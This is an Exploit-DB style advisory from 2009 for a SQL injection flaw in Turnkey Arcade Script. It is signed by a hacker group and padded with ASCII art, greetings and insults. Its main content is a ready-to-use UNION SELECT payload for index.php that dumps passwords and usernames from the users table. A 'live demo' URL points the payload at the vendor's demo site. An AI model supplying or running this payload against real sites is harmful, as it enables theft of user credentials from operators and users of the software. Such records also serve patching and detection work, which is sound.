Exploit Turnkey Arcade Script - SQL Injection (2)

[Exploiter]

EDB-ID

9511

Проверка EDB

1. Пройдено

Автор

RED-D3V1L

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2009-3973 cve-2008-5629

Дата публикации

2009-08-25

==============================================================================
  ##  Hackteach.OrG ##
             

/ ___   )(  __   )/ ___   )
\/   )  || (  )  |\/   )  |
    /   )| | /   |    /   )
   /   / | (/ /) |   /   / 
  /   /  |   / | |  /   /  
 /   (_/\|  (__) | /   (_/\
(_______/(_______)(_______/
       
==============================================================================
        [»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [»]  Arcad site Script <== Remote SQL Injection Vulnerability
==============================================================================
    [»] my home:             [ Hackteach.org ]
    [»] Script:              [ Arcad site Script ]
    [»] Language:            [ PHP ]
    [»] Download:            [ http://www.turnkeyarcade.com/ ]
    [»] Founder:             [ Red-D3v1L < [email protected] > ]
    [»] Gr44tz to:           [ All member Hackteach.org/cc - Str0ke - sp3x ]
    [»] Fuck To :            [ Anti-trust << Big Big Big Lamer << ]
########################################################################

===[ Exploit SQL ]===  

    [»] Path/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--


    [»] L1v3 d3m0 : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--

Author: Red-D3v1L <-

###########################################################################

# milw0rm.com [2009-08-25]